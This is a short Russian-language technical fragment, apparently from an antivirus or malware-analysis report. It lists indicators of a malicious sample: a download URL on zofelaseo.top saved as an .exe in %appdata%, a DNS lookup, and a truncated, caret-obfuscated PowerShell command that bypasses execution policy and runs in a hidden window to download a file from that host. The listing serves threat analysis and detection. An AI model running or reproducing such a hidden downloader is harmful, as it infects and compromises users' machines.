Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^e^R^S^HelL.^eXe -^eXECu^Ti^O^n^pOl^iCy b^YP^as^s -^NO^pRoFi^Le -wIndow^S^TYLe Hi^DDE^n^ (NE^W-oB^jEct ^s^YsT^e^M.^N^e^t.WEbC^L^ie^N^t)^.^Dow^nLOADfilE('http://zofelaseo.top/read.p...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "poW^e^R^S^HelL.^eXe -^eXECu^Ti^O^n^pOl^iCy b^YP^as^s -^NO^pRoFi^Le -wIndow^S^TYLe Hi^DDE^n^ (NE^W-oB^jEct ^s^YsT^e^M.^N^e^t.WEbC^L^ie^N^t)^.^Dow^nLOADfilE('http://zofelaseo.top/read.p...' (со скрытым окном)